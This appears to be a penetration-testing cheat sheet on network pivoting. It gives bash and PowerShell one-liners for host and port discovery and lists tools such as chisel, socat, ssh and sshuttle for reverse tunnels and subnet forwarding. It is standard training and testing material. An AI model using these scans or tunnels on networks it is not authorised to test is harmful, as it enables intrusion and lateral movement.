Pivoting
Binaries
You can download some useful binaries such as chisel, socat, nmap, etc. (verify the release checksums of anything you pull from these repositories before running it): https://github.com/jpillora/chisel https://github.com/3ndG4me/socat https://github.com/andrew-d/static-binaries
Host discovery
for ip in <network_prefix>.{1..254}; do ((ping -c1 -W1 $ip &>/dev/null && echo $ip)&) done; wait
$t = 1..254 | % { [Net.NetworkInformation.Ping]::new().SendPingAsync("<network_prefix>.$_", 100) }; [Threading.Tasks.Task]::WaitAll($t); $t.Result.Where{$_.Status -eq "Success"}.Address.IPAddressToString
./nmap -sn <subnet>
arp -a
Port discovery
for port in {1..65535}; do ((bash -c "echo > /dev/tcp/<target_ip>/$port" 2>/dev/null && echo $port)&); (( port % 200 == 0 )) && wait; done; wait
With progress:
for port in {1..65535}; do ((bash -c "echo > /dev/tcp/<target_ip>/$port" 2>/dev/null && echo -e "$port\033[K")&); (( port % 200 == 0 )) && wait && echo -ne "$port/65535\r"; done; wait
$ip = "<target_ip>"; $pool = [RunspaceFactory]::CreateRunspacePool(1, 100); $pool.Open(); $rs = for ($p = 1; $p -le 1024; $p++) { $ps = [PowerShell]::Create(); $ps.RunspacePool = $pool; [void]$ps.AddScript({ param($ip, $p)try { $tcp = New-Object Net.Sockets.TcpClient; $r = $tcp.BeginConnect($ip, $p, $null, $null); if ($r.AsyncWaitHandle.WaitOne(300, $false) -and $tcp.Connected) { $tcp.EndConnect($r); $p } }finally { $tcp.Close() } }).AddArgument($ip).AddArgument($p); [PSCustomObject]@{P = $ps; S = $ps.BeginInvoke() } }; $rs | % { $r = $_.P.EndInvoke($_.S); if ($r) { $r }; $_.P.Dispose() }; $pool.Dispose()
./nmap -p- -sS -n -Pn --min-rate 10000 -v <target_ip>
Proxychains -> Nmap
for port in {1..65535}; do ((proxychains -q nmap -p$port -sT -n -Pn --open -v <target_ip> |& grep -Po '\d+(?=/tcp open)')&); (( port % 200 == 0 )) && wait; done; wait
Proxychains -> Bash
for port in {1..65535}; do ((proxychains -q bash -c "echo > /dev/tcp/<target_ip>/$port" 2>/dev/null && echo $port)&); (( port % 100 == 0 )) && wait; done; wait
Port forwarding
First, run the chisel server in reverse mode on your host:
chisel server -p <listener_port> --reverse
Then, connect to the server:
chisel client <listener_ip>:<listener_port> R:<local_port>:<remote_host>:<remote_port>
chisel client <listener_ip>:<listener_port> R:socks
socat tcp-l:<local_port>,fork,reuseaddr tcp:<remote_host>:<remote_port>
ssh <user>@<target_ip> -L <local_port>:<remote_host>:<remote_port>
ssh <user>@<target_ip> -D <socks_port>
Subnet forwarding
sshuttle -r <user>:<password>@<target_ip> <subnet>